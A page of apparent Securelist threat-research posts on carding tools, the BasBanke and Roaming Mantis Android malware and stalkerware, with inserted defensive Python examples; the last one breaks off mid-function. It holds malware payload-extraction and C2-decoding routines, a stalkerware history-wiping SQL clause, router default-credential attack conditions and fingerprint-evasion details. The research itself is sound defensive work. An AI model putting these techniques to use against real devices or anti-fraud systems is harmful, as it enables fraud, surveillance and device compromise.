Genesis Store owners want the use of stolen profiles to be as easy as possible, so they have developed a special .crx plugin for Chromium-based browsers. The plugin installs a stolen digital profile into the cybercriminal's own browser with a single mouse click, turning the buyer into a doppelganger of the victim. After that the criminal only needs to connect through a proxy server with an IP address from the victim's location, and he can pass the anti-fraud systems' verification mechanisms while pretending to be a legitimate user.

Genesis plugin

Fingerprint settings in Genesis plugin

For the customers who don’t want to buy real fingerprints, there is also an option to generate unique ones. Genesis Store gives its customers an opportunity to use Genesis algorithms and the plugin to generate random fingerprints that can be used, for example, to enter stolen bank card information into online store forms: such unique browser fingerprints will be properly configured, so the anti-fraud system will not be alarmed.

Genesis fingerprint generator

The dark sphere

Another tool widely used to bypass anti-fraud systems is the Tenebris Linken Sphere browser. Its developers position it as the perfect browser for anonymity, and in fact it has been used for carding for years. Unlike the Genesis plugin, Sphere is a fully functional browser with advanced fingerprint configuration capabilities, automatic proxy server validity testing and usage options, and more. It even features a user activity emulator: cybercriminals can program it to open the desired websites, follow links, stay on websites for a given length of time and so on, simply put, to trick the behavior analysis modules of anti-fraud systems. The Tenebris Linken Sphere developers have also created a marketplace of unique fingerprints that can be used with the Sphere browser.

Tenebris website

Unlike Genesis, Sphere uses a subscription-based licensing system. One month of browser usage costs $100; with access to the fingerprint market thrown in, the price is $500 per month.

Tenebris Sphere licenses

Sphere has much deeper configuration options for generated fingerprints: most parameters are fully adjustable, so one can create exactly the fingerprint needed to mimic a real user.

Configuration panel

Configuration panel



Anti-fraud systems are developing rapidly. They introduce new protection mechanisms to fend off fraudsters, while fraudsters develop new tools to break through the protection layers. The sums of money lost to carding attacks are huge, and cybercriminals are certain to scale up these malicious activities.

The security departments of financial organizations must always look for ways to counter such threats. Extra two-factor authentication for any transaction initiated using a bank card or payment system is an absolute necessity these days, even if the user’s digital profile appears legit to the protection system. Even though it is not very convenient for users to complete the extra authentication routine each time they want to buy online, it is the most effective safeguard against carding attacks for the present.

In addition, new user behavior analysis methods must be developed and implemented together with custom fingerprinting technologies, which may include hardware-based fingerprint collection operating at a deeper level than is currently available. Additional biometric authentication should be considered as well.

Kaspersky Lab continuously researches financial cybercrime to provide timely protection against the hostile activities.

BasBanke: Trend-setting Brazilian banking Trojan

4 Duben, 2019 - 13:00

BasBanke is a new Android malware family targeting Brazilian users. It is a banking Trojan built to steal financial data such as credentials and credit/debit card numbers, but it is not limited to this functionality. Propagation of this threat began during the 2018 Brazilian elections, registering over 10,000 installations by April 2019 from the official Google Play Store alone.

This malware can perform tasks such as keystroke logging, screen recording, SMS interception, and the theft of credit card and financial information. To trick users into downloading the malware, the authors advertise it via Facebook and WhatsApp messages. The campaign's URLs redirect victims either to the official Google Play Store or to a website hosting malicious APK packages.

Malicious applications used to distribute BasBanke, hosted in the Google Play Store.

The malicious applications hosted in Google Play Store disguise themselves as applications with supposed functionality such as a secure QR reader, a fake app for a real travel agency with travel deals, and – implementing a well-known trick – as an application to “see who visited your profile.” The most widespread malicious application is a fake version of CleanDroid, first announced in a paid advertisement on Facebook, and linking to the application hosted on the Play Store. This “miraculous” application promises to protect the victim’s device against viruses, to optimize memory space, and to save data when using a 3G or 4G connection. In reality it is a banking Trojan.

The malicious CleanDroid application shown in a Facebook advertisement. Source: Defesa Digital

The number of targeted banking applications and websites is quite significant: a considerable number of Brazilian financial institutions and other popular websites such as Spotify, YouTube and Netflix are on the target list. When it comes to stealing banking credentials, metadata such as the device name, IMEI and the telephone number used by the victim are also sent to a remote C2. Why pay special attention to this data? Fraudsters need it to mimic legitimate access to the victim's account.

Metadata extracted from the phone and sent to the remote C2.

Depending on the version of the malware, we found different targets – and they are all financial institutions. In addition, an extensive list of keywords defines what other brands or websites will trigger the keylogging procedure.

We have previously found a few similar malicious campaigns, but with significantly smaller distribution than BasBanke. Another difference is that BasBanke uses Facebook and WhatsApp as a mass distribution vector. It also appears to have sparked new ideas among Brazilian cybercriminal crews by showing how easy it is to infect an Android device with a malicious application hosted in the official store. The attackers behind BasBanke have proved that the Play Protect feature alone is not enough to stop them and effectively block their malware. In fact, BasBanke is the forerunner of a larger malicious campaign that we'll be reporting on soon.

Reference IoC



Interested in more information? Email us at financialintel@kaspersky.com

Roaming Mantis, part IV

3 Duben, 2019 - 18:30

One year has passed since we published the first blogpost about the Roaming Mantis campaign on securelist.com, and this February we detected new activities by the group. This blogpost is a follow-up to our earlier reporting on the group, with updates on their tools and tactics.

Mobile config for Apple phishing

Our key finding is that the actor continues to seek ways to compromise iOS devices and has even built a new landing page for iOS users. When an iPhone user visits this landing page, they see pop-up messages guiding them to install a malicious iOS mobile config:

Pop-up messages and mobile config installation

After installation of this mobile config, the phishing site automatically opens in a web browser and collected information from the device is sent to the attacker’s server. This information includes DEVICE_PRODUCT, DEVICE_VERSION, UDID, ICCID, IMEI and MEID.

XML and CA in mobile config

The CA contains the suspected developer’s email address, “zeeyf79797@yahoo.co[.]jp”, which could be malicious.
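To show what a defender should look for in such a profile, here is an added example (code written for this edit, not from the original post and not the actor's profile, which the post only shows as a screenshot): a Python triage routine for an unsigned .mobileconfig that reports Profile Service payloads requesting device identifiers, plus payload types that redirect traffic or change what the device trusts. The profile layout follows Apple's documented OTA profile-service format; the sample profiles, their URL and identifiers, and the list of risky payload types are constructed assumptions for the example.

```python
import plistlib

# Device attributes an OTA "Profile Service" payload may ask iOS to report back
# (Apple's profile-service format; the list mirrors the fields named above).
SENSITIVE_ATTRS = {"UDID", "IMEI", "ICCID", "MEID", "VERSION", "PRODUCT", "SERIAL"}

# Payload types that change what the device trusts or where its traffic goes.
# Assumed watch-list for this example, not an exhaustive catalogue.
RISKY_PAYLOADS = {
    "com.apple.security.root": "installs a trusted root CA",
    "com.apple.security.pem": "installs a certificate",
    "com.apple.proxy.http.global": "sets a global HTTP proxy",
    "com.apple.vpn.managed": "configures a VPN",
    "com.apple.dnsSettings.managed": "overrides DNS settings",
    "com.apple.webClip.managed": "adds a home-screen web clip",
}


def triage_profile(raw):
    """Return (kind, detail, note) findings for an unsigned .mobileconfig.

    Signed profiles are CMS-wrapped and must be unwrapped first (for example
    with `openssl smime -verify -noverify -in profile.mobileconfig -inform DER`).
    """
    prof = plistlib.loads(raw)
    findings = []
    content = prof.get("PayloadContent")
    if prof.get("PayloadType") == "Profile Service" and isinstance(content, dict):
        # An enrollment profile: the device POSTs the listed attributes to URL.
        asked = sorted(set(content.get("DeviceAttributes", [])) & SENSITIVE_ATTRS)
        if asked:
            findings.append(("exfil", content.get("URL"), ", ".join(asked)))
    elif isinstance(content, list):
        # An ordinary configuration profile carrying one or more payloads.
        for payload in content:
            ptype = payload.get("PayloadType")
            if ptype in RISKY_PAYLOADS:
                findings.append(("payload", ptype, RISKY_PAYLOADS[ptype]))
    return findings


def is_suspicious(raw):
    return bool(triage_profile(raw))


# Constructed sample: a lure profile of the kind described above. All names,
# UUIDs, identifiers and the URL are invented for this example.
PHISHING_PROFILE = plistlib.dumps({
    "PayloadType": "Profile Service",
    "PayloadVersion": 1,
    "PayloadUUID": "0B1A5B5E-0000-4000-8000-000000000001",
    "PayloadIdentifier": "com.example.apple-id-check",
    "PayloadDisplayName": "Apple ID verification",
    "PayloadContent": {
        "URL": "https://phish.example/enroll",
        "DeviceAttributes": ["UDID", "IMEI", "ICCID", "VERSION", "PRODUCT"],
        "Challenge": "constructed-challenge",
    },
})

# Constructed benign comparison: a plain Wi-Fi configuration profile.
WIFI_PROFILE = plistlib.dumps({
    "PayloadType": "Configuration",
    "PayloadVersion": 1,
    "PayloadUUID": "0B1A5B5E-0000-4000-8000-000000000002",
    "PayloadIdentifier": "com.example.wifi",
    "PayloadContent": [{
        "PayloadType": "com.apple.wifi.managed",
        "PayloadVersion": 1,
        "PayloadUUID": "0B1A5B5E-0000-4000-8000-000000000003",
        "PayloadIdentifier": "com.example.wifi.office",
        "SSID_STR": "office", "EncryptionType": "WPA", "Password": "x",
    }],
})
```

A profile that requests UDID, IMEI and ICCID and posts them to an unknown host has no legitimate reason to exist outside an MDM enrollment the user initiated, which is exactly the behaviour the post describes for this landing page.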

We created a test account for this research and used the account credentials at the phishing site. As soon as the threat actor received the ID and password, the criminals attempted to log in to the account from Hong Kong. After entering the credentials, we were directed to the next page, which tried to steal the two-factor authentication code (PIN) sent to the device.

Phishing page for stealing apple ID and two-factor authentication

Re-spreading the updated sagawa.apk Type A (MoqHao/XLoader)

On the Android front, our telemetry data shows a new wave of malicious APK files which we detect as “Trojan-Dropper.AndroidOS.Wroba.g”.

sagawa.apk Type A has spread since Feb 26

We have analyzed the malicious APK file and confirmed that it is definitely a variant of the sagawa.apk Type A malware, also known as MoqHao (McAfee) and XLoader (TrendMicro). Type A malware was earlier distributed via SMS in Japan.

We also found that the threat actors had once again compromised routers to overwrite their DNS settings (see below), and that the following two features of the Android malware were updated as well:

  • Decryption algorithm for encrypted payload in Trojan-Dropper module
  • Stored destination and accounts for getting real C2

Decryption algorithm for encrypted payload in Trojan-Dropper module

Compared to the previous version, the Trojan-Dropper’s decryption function has been altered slightly (change highlighted in purple):

Added 4-byte skip from encrypted data in decompiled code

Why did the attackers change it? The simplified Python script for extracting the encrypted payload was disclosed in our previous blog posts. We suspect that the actor took this into account and introduced a minor change to the decryption algorithm to evade detection by security products and researchers.

However, we have updated the simplified Python script to account for this change:

  • sagawa.apk_typeA_payload_extractor_1.01.py

    #!/usr/bin/env python
    import sys
    import zlib
    import base64

    # Read the encrypted payload file (\assets\bin in the new samples)
    data = open(sys.argv[1], "rb").read()
    # The updated dropper skips the first four bytes before inflating
    # (open.skip(4) in the decompiled code); the old version started at offset 0
    dec_z = zlib.decompress(data[4:])
    # The inflated data is a base64 string wrapping the real DEX payload
    dec_b = base64.b64decode(dec_z)
    with open(sys.argv[1] + ".dec", "wb") as fp:
        fp.write(dec_b)

Stored destination and accounts for getting real C2

    In the previous campaign, three @outlook.com accounts, "haoxingfu11", "haoxingfu22" and "haoxingfu33", were stored inside the samples for retrieving the C2 server address: the malware queried the email service, and the real C2 destination was delivered to the victims in encrypted form in the email subject. In the new version the actor has switched from the email service to fetching the C2 address from Twitter.

    “https://twitter.com/%s” is stored in the malware

    The three suspected Twitter accounts were easily found as well, because the sample had the account IDs stored together, separated by the “|” character just like the old samples:

    Three account IDs separated by the “|” character

    The decryption algorithm for the real C2 address remained untouched – the malware connects to the extracted real C2 via web socket. In addition to the three accounts mentioned earlier, we found several other accounts:

    • lucky88755
    • lucky98745
    • lucky876543
    • gyugyu87418490
    • luckyone1232
    • sadwqewqeqw

    The decryption algorithm for extracting the real C2 from Chinese characters is the same as in the previous sample, so our scripts from the old blogpost will still work. All the accounts are related to the same IP, although the port numbers are different. The table below shows these changes as derived from the account “@luckyone1232”.

    Datetime (UTC)         | Encrypted data                          | Decrypted real C2
    February 25 2019 11:30 | 傘傠傘偠傈傠偠傠傐傸偘储傀傐僨傀僨僸傸傀 | 114.43.155[.]227:28855
    February 26 2019 08:00 | 傀傸傸偠傠傠傠偘傘储偘傰傠僠僨傀僨僸傸傀 | 220.136.47[.]169:28855
    March 02 2019 01:00    | 傀傸傸偠傠傠傠偘傘僘偘傰傈傐僨傀僨僸傸傀 | 220.136.49[.]137:28855
    March 05 2019 06:00    | 傀傸傸偠傠傠傠偘傠僘偘傰僀傸僸僐傀傐     | 220.136.39[.]1:28855
    March 07 2019 03:00    | 傘傠僸偠傠傈僐偘傰傈储偈傀傰傈僀傸僸僐傀傐 | 118.168.130[.]236:28855
    March 09 2019 10:00    | 傠傠偈傀傰傸偠傸傰傐偘储傀僨僨傀僨僸傸傀 | 61.230.210[.]228:28855
    March 13 2019 01:00    | 傘傸傐偠傸储储偘傰储傈偈傈傀僨傀僨僸傸傀 | 125.227.174[.]35:28855
    March 21 2019 01:00    | 傘偘傰傠僠偈傀储傠偠傈僸僀傸僸僐傀傐     | 1.169.203[.]48:28855
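As an added example (code written for this edit, neither the malware's own code nor Kaspersky's script), the following Python reproduces the real-C2 decoding used by the sample so the table above can be regenerated from a saved profile page: each CJK code point has 0x4E00 subtracted, is shifted right by three bits and XORed with the repeating key "beg", exactly as in the decryption loop quoted from the sample. The title-matching regex is a simplified form of the sample's pattern (it stops at the first non-CJK character), the sanity check that the result looks like ip:port and the encoder used to build test data are additions, and the sample HTML is constructed; only the encoded strings come from the table.

```python
import re

KEY = b"beg"        # three-byte XOR key from the sample's decryption loop
CJK_BASE = 0x4E00   # start of the CJK Unified Ideographs block

# The sample pulls the CJK run out of the Twitter page title with a pattern of
# the form <title>abcd([\u4e00-\u9fa5]+?) ...; this simplified variant stops at
# the first non-CJK character (an assumption about the surrounding title text).
TITLE_RE = re.compile(r"<title>abcd([\u4e00-\u9fa5]+)")
# A decoded value is only accepted if it has the shape of an IPv4 socket address.
C2_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}:\d{1,5}$")


def decrypt_c2(ext):
    """Recover 'ip:port' from the CJK string, as the sample does."""
    return "".join(
        chr(((ord(ch) - CJK_BASE) >> 3) ^ KEY[i % len(KEY)])
        for i, ch in enumerate(ext)
    )


def encrypt_c2(text):
    """Inverse of decrypt_c2, written here only to build test data. The decoder
    discards the low three bits of every code point, so they are left at zero."""
    return "".join(
        chr(((ord(c) ^ KEY[i % len(KEY)]) << 3) + CJK_BASE)
        for i, c in enumerate(text)
    )


def extract_c2(html):
    """Return the C2 as 'ip:port' if the title carries a well-formed encoded
    address, else None (a renamed or suspended account yields garbage, not a C2)."""
    m = TITLE_RE.search(html)
    if not m:
        return None
    candidate = decrypt_c2(m.group(1))
    return candidate if C2_RE.match(candidate) else None


def defang(addr):
    """Write 114.43.155.227:28855 as 114.43.155[.]227:28855, as in the table."""
    host, _, port = addr.rpartition(":")
    a, b, c, d = host.split(".")
    return "%s.%s.%s[.]%s:%s" % (a, b, c, d, port)


# Constructed stand-in for a fetched profile page; only the encoded string is
# taken from the table above, the surrounding HTML is invented.
SAMPLE_PROFILE_HTML = (
    "<html><head><title>abcd傘傠傘偠傈傠偠傠傐傸偘储傀傐僨傀僨僸傸傀 (@luckyone1232) "
    "| Twitter</title></head><body></body></html>"
)
```

Because the low three bits of every code point are thrown away, any number of visually different strings decode to the same address; a detection that compares the raw CJK text will therefore miss trivially re-encoded variants, whereas one that decodes first will not.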

    We also noticed that the threat actor has introduced a new backdoor command “getPhoneState”. The following table shows the comparison of the older and newer versions of the malware:

    Field                              | August 08 2018 sample                                     | March 03 2019 sample
    MD5                                | 956f32a28d0057805c7234d6a13aa99b                          | 651b6888b3f419fc1aac535921535324
    File size                          | 427.3 KB (437556 bytes)                                   | 396.0 KB (405504 bytes)
    Malware type                       | sagawa.apk Type A, MoqHao (McAfee), XLoader (TrendMicro)  | sagawa.apk Type A, MoqHao (McAfee), XLoader (TrendMicro)
    Encrypted payload (enc_data)       | \assets\a                                                 | \assets\bin
    Decryption algorithm for payload   | payload = base64.b64decode(zlib.decompress(enc_data))     | payload = base64.b64decode(zlib.decompress(enc_data[4:]))
    Backdoor commands                  | sendSms, ping                                             | sendSms, getPhoneState
    Stored destination                 | @outlook.com (email)                                      | https://twitter.com/%s (SNS)
    Accounts                           | haoxingfu11, haoxingfu33                                  | luckyone1232, gyugyu87418490
    RegExp                             | abcd                                                      | <title>abcd([\\u4e00-\\u9fa5]+?) "
    Decryption algorithm for real C2   | unchanged in both versions:

        for i in range(len(ext)):
            dec = dec + chr((ord(ext[i]) - 0x4e00) >> 3 ^ ord('beg'[j]))
            j = (j+1) % 3

    Rogue DNS settings in compromised routers again

    In late February 2019, we detected a URL query of a malicious DNS changer. Here is an example:

    URL query of malicious DNS changer

    The router's DNS settings can be overwritten if a device on the local network loads the DNS changer's URL query and the router meets any of the following conditions:

    1. No authentication is required for the router's admin panel from the local network
    2. The device still holds an authenticated admin session for the router panel
    3. The router panel uses a simple or default ID and password, such as admin:admin

    As we have observed, several hundred routers have been compromised and all pointed to the rogue DNS IPs.

    This code overwrites the router's DNS settings with the rogue DNS IPs below:

    • 171.244.33[.]114
    • 171.244.33[.]116
    Geographical expansion

    Our KSN data from February 25, 2019 to March 20, 2019 shows new variants of sagawa.apk Type A (Trojan-Dropper.AndroidOS.Wroba.g) being detected in the wild in the following countries:

    Geographical expansion from KSN data

    The worst affected countries are Russia, Japan, India, Bangladesh, Kazakhstan, Azerbaijan, Iran and Vietnam. Our products detected this malware over 6,800 times for over 950 unique users during this period. We believe this attack wave has a much bigger scale and these numbers reflect only a small part of this campaign.


    We have seen increased distribution of sagawa.apk Type A since late February 2019. This wave is characterized by a new attack method of phishing with malicious mobile config, although the previously observed DNS manipulation is also still actively used. We find the use of malicious mobile config especially alarming as this may cause serious problems for the users. As explained in an earlier blog post, “the profile could configure the device to use a malicious proxy or VPN, effectively allowing the attacker to monitor everything.”

    We recommend users take the following steps:

    • Change the router's default ID and password, and apply the relevant firmware security patches to counter these threats;
    • For Android users: do not download APKs from third-party sources;
    • For iOS users: do not install a non-trusted third-party mobile config.

    For further information about this threat actor, please refer to our previous blog posts about Roaming mantis:

    Kaspersky Lab products detect this malware for Android as:

    • HEUR:Trojan-Banker.AndroidOS.Wroba
    • HEUR:Trojan-Dropper.AndroidOS.Wroba

    Finally, we would like to show our appreciation to the Japanese researchers @ninoseki and @papa_anniekey, who have shared and discussed with us the results of their Roaming Mantis research. The criminals are still rapidly improving their methods: we discovered an updated sagawa.apk Type A this April, and the fresh sample embeds the DES algorithm in place of one of the earlier decryption features. We will keep tracking Roaming Mantis and publish any new activities in the future.

    Indicators of compromise (IoCs) examples

    Malicious hosts:
    • 114.43.155[.]227 (real C2)
    • 220.136.47[.]169 (real C2)
    • 220.136.49[.]137 (real C2)
    • 220.136.39[.]1 (real C2)
    • 118.168.130[.]236 (real C2)
    • 171.244.33[.]114 (rogue DNS)
    • 171.244.33[.]116 (rogue DNS)
    • 61.230.153[.]211 (landing page)
    • 154.223.62[.]130 (landing page)
    • ffakecg[.]com (landing page)
    • sagawa-mwm[.]com (landing page)
    • sagawa-mqd[.]com (landing page)
    • sagawa-bz[.]com (landing page)
    • nttdocomo-qae[.]com (landing page)
    • nttdocomo-qat[.]com (landing page)

    Suspicious Twitter accounts:
    • luckyone1232
    • sadwqewqeqw
    • gyugyu87418490
    • lucky88755
    • lucky98745
    • lucky876543
    sagawa.apk Type A and its modules:
    • 417a6af1172042986f602cc0e2e681dc (APK file)
    • 651b6888b3f419fc1aac535921535324 (APK file)
    • 0a4e8d3fe5ee383ba3a22d0f00670ce3 (APK file)
    • 870697ddb36a8f205478c2338d7e6bc7 (APK file)
    • 7e247800b95c643a3c9d4a320b12726b (\classes.dex)
    • 7cfb9ed812e0250bfcb4022c567771ec (\classes.dex)
    • 8358d2a39d412edbd1cf662e0d8a9f19 (\classes.dex)
    • af2890a472b85d473faee501337564a9 (decrypted dex file)
    • c8d7475a27fb7d669ec3787fe3e9c031 (decrypted dex file)
    • d0848d71a14e0f07c6e64bf84c30ee39 (decrypted dex file)
    • e2b557721902bc97382d268f1785e085 (decrypted dex file)

Beware of stalkerware

3 Duben, 2019 - 12:00

Spyware might sound like a concept from a Hollywood movie, yet commercial versions of such programs – known in the cybersecurity industry as ‘stalkerware’ – are a daily reality for many people. For the price of just a few dollars, consumer spyware programs allow users to spy on their current or former partners, and even strangers. This can be done by simply installing an app on the targeted victim’s smartphone or tablet. Once this has happened, the stalker is granted access to a range of personal data: from the victim’s location and SMS, to social media messages and live feeds from their device camera or microphone.

From observing stalkerware program functionality, it can be seen that there are very few differences between commercial spyware (detected and defined by most security software as ‘not-a-virus’) and classic spying malware. For example, a consumer surveillance program works like this:

  • The command and control server (C2) is provided by the service owners
  • It is easier to buy and deploy than spying malware: there is no need to visit shady hacking forums or to have programming skills, and in almost all cases it requires only a simple manual installation

Stalkerware programs have been exposed and publicly criticized multiple times, yet in most countries their legal status remains vague, while some brands market their programs as child-tracking software. These programs should not be confused with legal parental control software and 'find my phone' apps, despite the overlap in functionality. Firstly, they are distributed through dedicated landing pages, a direct violation of Google Play safety recommendations. Secondly, these apps have functionality that allows them to invade an individual's privacy without their consent or knowledge: the application icon can be hidden from the applications menu while the app continues to run in the background, and some functions of the app fulfil surveillance tasks (such as recording the victim's voice). Some even delete traces of their presence from the phone, along with any installed security solutions, once the attacker manually grants the application root access.

We detect such programs as ‘not-a-virus:Monitor’ and have been keeping a close eye on them. Two years ago, we published our first overview and continued to monitor such threats. We have now decided to conduct further research to check how stalkerware is being used and determine the most prominent features of the latest consumer surveillance programs.

We examined applications for mobile platforms, with a particular focus on Android, because it is the most popular OS that stalkerware is implemented on. For attackers to perform extended exfiltration activities on iOS devices, the devices need to be jailbroken first.

All in all, 2018 saw 58,487 users who had a stalkerware application installed on their phones or tablets. That is a moderate number compared to other types of threats. For example, during the same period, the number of users who encountered ransomware was 187,321. However, it should be noted that when it comes to malware, our figures show how many people we were able to protect from infection. But when we look at stalkerware, the situation is a bit different.

Out of the 58,487 users on whose devices we detected stalkerware apps, approximately 35,000 had these apps installed before they installed Kaspersky Lab products and the first security scan was performed. This could mean they were unaware of the presence of such software on their device.

In total, in 2018 we identified 26,619 unique samples of stalkerware programs.

The following statistics reveal the most detected stalkerware applications based on the number of unique users of Kaspersky Lab for Android mobile products:

The most often detected stalkerware apps by the number of targeted users, 2018

Apart from these applications, we have also chosen a number of other programs that we’ve been monitoring manually for a while.

After having them analyzed, we found some important features that, when put together, paint a clear picture of how stalkerware is now used, and we have listed six reasons to stay as far away from these applications as possible.

Their distribution methods pose a threat

Because of their aggressive nature, stalkerware programs cannot be found or listed in the App Store or on Google Play. In most cases, however, they can be found after a quick internet search and downloaded from dedicated landing pages. Naturally, these programs require users to enable the installation of applications hosted outside Google Play, which puts the device at risk: allowing apps that are not available on Google Play makes an Android device vulnerable to malware and goes against Google's security policies.

The programs are being advertised through online banners. Cybercriminals also use ‘Black Hat SEO‘ techniques, to ensure the website supporting the program is moved up the search engine ranking and appears at the top of search results pages.

The main ‘infection’ vector of stalkerware applications is manual installation, since the attacker needs to register a device after installation by entering license credentials. After this quick configuration process, the stalkerware program is ready to spy on the attacker’s target, and its presence is hidden on the device. This is the case with Mobile Tracker Free:

Moreover, some programs take additional measures to avoid detection by the victim, for example by masquerading as a system service in the list of installed applications:

This masking feature is common among typical Android threats. In some more secretive cases, stalkerware applications cover all their tracks: upon installation, the application removes the downloaded installer file and clears the browser history of the web pages related to the program's distribution. These code chunks illustrate how FreeAndroidSpy does it:

Cleaning up the ‘downloads’ directory

Removing the browser history

The full SQL selection clause used to remove the browser history entries:

url like \’%freeandroidspy.com%\’ or url like \’%spysetup.com%\’ or url like \’%spysetup.co%\’ or url like \’%ytubecache.com%\’ or url like \’%my.spysetup.com%\’

It filters history entries by the specific web pages used to download the FreeAndroidSpy stalkerware installer.

You never know which one is actually on a device

Spyware has established itself as a popular product, and some programs have become part of several distribution schemes: they differ in name and in the website where they are sold, but are actually the same product. This is an important point that applies to many stalkerware products. Some vendors let third parties buy a franchise and distribute the product under their own brand, as iSpyoo does:

Screenshot from the iSpyoo official site

As a result, we’ve detected a number of iSpyoo samples that are technically the same. Here are two examples of ones we’ve examined: Copy9 (8ac6209894fff56cf2a83f56408e177d) and TheTruthSpy (a20911f85741ed0f96cb4b075b7a32c1).

Both were signed with certificates that have the same issuer/subject:

But further analysis shows the only – but big – difference: they have different C2 server addresses in the same code.

So technically this is the same stalkerware application, but packaged as different products with their own websites, names, marketing strategies and C2 servers.

Both versions of this application have the same user interface:

Obviously, such products have the same server-side part, and this is crucial. If a cyberattacker discovers an exploitable vulnerability in the C2 server of one product, all the other products will be at risk of exposing data as well.

Rather predictably, both TheTruthSpy and Copy9 were hacked in 2018.

Photographs, SMS, WhatsApp chats, call recordings, contacts, and the browser history of thousands of stalkerware victims were leaked to third-parties.

Trusting these applications with your partner’s data puts it at risk of exposure

This brings us on to another important point. As is the case with many spyware programs, they don’t just invade an individual’s privacy, they also store an overwhelming amount of sensitive personal data (in some cases, all of a person’s digitalized personal data) with poor security and a high risk of exposure.

As mentioned above, such programs came to our attention a while ago, and we conducted major research on them in 2017. Back then, we discovered that many had significant security flaws. In particular, we found a critical directory listing vulnerability in SpyMaster Pro:

An incorrect C2 server configuration gave anyone full access to the victims' stolen data. Although this vulnerability has since been fixed, it comes as no surprise that hackers became very interested in this kind of service.

In fact, the past 12 months have produced a lot of known stalkerware data breaches. For example, the MSpy application leaked millions of sensitive records, and not for the first time.

Other widely discussed application data breach cases include the hacking of FlexiSpy, one of the most expensive ($68 per month) programs on the market, and Mobile Spy by Retina-X, which was first breached in 2017 and then again in 2018, with the data shared with Motherboard magazine. This contained intercepted text messages indicating that the program was being used to spy non-consensually on some victims.

Note on Mobile Spy official site

Overall, we found that five out of the 10 most popular stalkerware program families had poor security or had leaked a tremendous amount of personal data due to breaches.

Their infrastructure is questionable to say the least

These breaches were not accidental; they stem from security issues in the stalkerware infrastructure. Unfortunately, according to our statistics, many C2 servers contain critical security vulnerabilities that attackers can exploit to expose users' sensitive information.

Besides the critical directory listing vulnerability that we described in a previous publication, we also examined Talklog – a Russian-speaking product.

It’s easy to determine the C2 server address since it is hardcoded into the sample code:

The following directory is forbidden for listing:

But with simple crawling we could find a phpMyAdmin service here – /myadmin:

Its documentation path is available as well, so we could determine the current version of the service:

This is a very outdated version; at the time of our research the current version of phpMyAdmin was 4.8.5.

A simple search in the Offensive Security Exploit Database reveals multiple exploits that could be used to harm or even take control of the C2 server:

Another service that we easily found is SquirrelMail, here – /webmail:

As the login form shows, it is version 1.4.23, which, according to the exploit database, appears vulnerable to a Remote Code Execution exploit as well:

This top level analysis, without serious penetration testing procedures, already reveals major security issues within the stalkerware app server that could be exploited by potential attackers and expose the sensitive information of all victims.

You never really know where they come from

Another trait of many stalkerware services is their unknown origins. In the majority of cases, these are far from transparent, to say the least. We don’t know where they come from, who is behind them, who develops these programs and which legislation should be applied to them.

Let’s take MobileTool as a prime example of this. Even though there is a mention of “ltd. OEME-R Technology, Israel” in its company details on its official site, there are a couple of clues that point to the original roots of the service.

Company details

  • The official site is available only in Russian
  • The EULA from the official site contains a mention of “Minsk” – the capital of Belarus
  • Contact information contains a telephone number that is easily attributed to the Velcom operator – a Belarus telephone provider

That number is also linked to a person who tried to sell a house located in Brest on a Belarus property website:

Fun fact: according to the webpage of this application on 4pda.ru, it’s unavailable in Belarus, even though that is the suspected country of origin for the application.

Warning! The service is not available in Belarus! Do not try to avoid this restriction. You will just lose your money.

So, it looks like the developers wanted to avoid some local law with that restriction.

Another example of a program with a suspicious origin is the Spy Phone App. It is registered in Pervolia, Larnaca, Cyprus, an area that has offshore policies and flexible legislation for registered businesses, as well as secrecy laws that protect people’s identities, lenient financial reporting standards and very low taxes.

Their self-protection mechanisms are too aggressive

Even though stalkerware is detected as not-a-virus, these applications have rather aggressive self-protection policies. During our research we observed different self-protection/hiding techniques (some of which have been mentioned above). One of the most notable belongs to the Reptilicus stalkerware application. When it is first launched, it scans all the installed applications and matches them with its hardcoded list:

As we can see, this list contains dozens of names of mobile antivirus products, which could detect and remove stalkerware products because they register as harmful applications. For example, according to VirusTotal, this sample of Reptilicus is detected by 20 of the 59 vendors represented on the service:

If this stalkerware finds an installed antivirus product from this list, a special message will be shown to the user with a request to delete the antivirus product or to whitelist the Reptilicus application:

Conflict applications found, remove it or put application to exclusion list. If you do not do this, our application may work intermittently. Found conflicting applications:

Their installation manuals make you not only a stalker but also a cyberfraudster

Another notable trait of almost all stalkerware products is an installation manual that violates many security policies. The Mobile Tracker Free official website has this kind of installation guide and it includes some alarming recommendations.

According to this guide, you must:

  • Enable installations from unknown sources on your phone if you haven’t already done so. “Check the box ‘Unknown sources’. Accept the warning by clicking ‘OK’.”
  • Allow the installation of unknown applications to a mobile browser.
  • Disable Google Play Protect. “Google has added a security system for apps that are not downloaded from Google Play called ‘Play Protect’. It is possible that the Mobile Tracker Free application is detected as potentially dangerous. To prevent the app from being uninstalled, you must disable Google Play Protect and disable notifications related to Google Play Protect.”

This is probably the most horrible mobile security guide that could be presented to a user, as all these steps put a device at risk of being infected by any malware or not-a-virus threats in the future. Moreover, and this is probably the most crucial point here, this guide does not include steps to revert the settings to their original state after installation, so the device on which this software is installed will remain vulnerable.
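
As an added example (not part of the Securelist article), here is a small Python audit script a defender could run over the output of `adb shell settings get` and `adb shell appops get` to see which of the settings the guide asks the user to weaken are still in the weakened state, and which command restores each one. The setting keys install_non_market_apps and package_verifier_enable, the appops output format and the revert commands are assumptions about the Android Settings provider; the sample device outputs are constructed.

```python
"""Audit the Android settings a stalkerware install guide tells the user to weaken.

Added example, not from the article. Input is text captured beforehand with
  adb shell settings get <namespace> <key>
  adb shell appops get <package> REQUEST_INSTALL_PACKAGES
The keys, the appops output format and the revert commands are assumptions
about the Android Settings provider; the sample outputs below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    item: str       # what is still weakened
    observed: str   # raw value seen on the device
    revert: str     # command that restores the safe state


# (label, namespace, key, values considered safe, revert command).
# "null" is printed when a key was never written, i.e. the platform default,
# which is the safe state for both keys below.
SETTING_CHECKS = [
    ("Unknown sources (pre-Android 8 global switch)", "secure",
     "install_non_market_apps", {"0", "null"},
     "adb shell settings put secure install_non_market_apps 0"),
    ("Play Protect app verification", "global",
     "package_verifier_enable", {"1", "null"},
     "adb shell settings put global package_verifier_enable 1"),
]

APPOPS_MODE = re.compile(r"REQUEST_INSTALL_PACKAGES:\s*(\w+)")


def audit_settings(settings_output):
    """settings_output maps (namespace, key) -> text printed by `settings get`."""
    findings = []
    for label, ns, key, safe, revert in SETTING_CHECKS:
        observed = settings_output.get((ns, key), "null").strip()
        if observed not in safe:
            findings.append(Finding(label, observed, revert))
    return findings


def audit_install_sources(appops_output):
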